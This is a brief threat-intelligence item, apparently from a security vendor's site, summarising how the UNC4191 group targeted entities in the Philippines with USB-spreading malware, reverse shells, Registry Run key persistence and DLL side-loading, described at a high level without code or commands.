New: Threat Exposure Validation Impact Report 2025
Learn More
Join our Summer Webinar Series on Threat Exposure Validation
Register Now
Come meet us at Black Hat USA 2025 | Booth 1640
Book a Meeting

UNC4191 Threat Group Targets Entities In The Philippines

December 1, 2022

The UNC4191 threat group was discovered targeting entities in the Philippines with custom malware and the NCAT command-line networking utility. The malicious software is written in C/C++, replicates by infecting new removable drives, and creates a reverse shell to the actor's command and control server. Registry Run keys are used for persistence while multiple legitimate binaries are leveraged for DLL Side-Loading.